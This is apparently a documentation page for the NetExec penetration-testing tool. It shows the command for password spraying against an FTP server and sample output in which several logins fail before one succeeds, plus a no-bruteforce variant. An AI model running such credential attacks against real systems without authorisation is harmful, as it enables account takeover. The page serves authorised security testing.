Password Spraying
Password Spraying Usage
nxc ftp <ip> -u <users.txt> -p <passwords.txt>nxc ftp 192.168.0.10 -u users.txt -p passwords.txt
FTP 192.168.0.10 21 192.168.0.10 [*] Banner: (vsFTPd 3.0.5)
FTP 192.168.0.10 21 192.168.0.10 [-] admin:admin (Response:530 Login incorrect.)
FTP 192.168.0.10 21 192.168.0.10 [-] root:admin (Response:530 Login incorrect.)
FTP 192.168.0.10 21 192.168.0.10 [-] marshall:admin (Response:530 Login incorrect.)
FTP 192.168.0.10 21 192.168.0.10 [-] admin:toor (Response:530 Login incorrect.)
FTP 192.168.0.10 21 192.168.0.10 [-] root:toor (Response:530 Login incorrect.)
FTP 192.168.0.10 21 192.168.0.10 [-] marshall:toor (Response:530 Login incorrect.)
FTP 192.168.0.10 21 192.168.0.10 [-] admin:badpassword (Response:530 Login incorrect.)
FTP 192.168.0.10 21 192.168.0.10 [-] root:badpassword (Response:530 Login incorrect.)
FTP 192.168.0.10 21 192.168.0.10 [+] marshall:badpasswordPassword spraying (without bruteforce)
nxc ftp <ip> -u <users.txt> -p <passwords.txt> --no-bruteforceLast updated
Was this helpful?

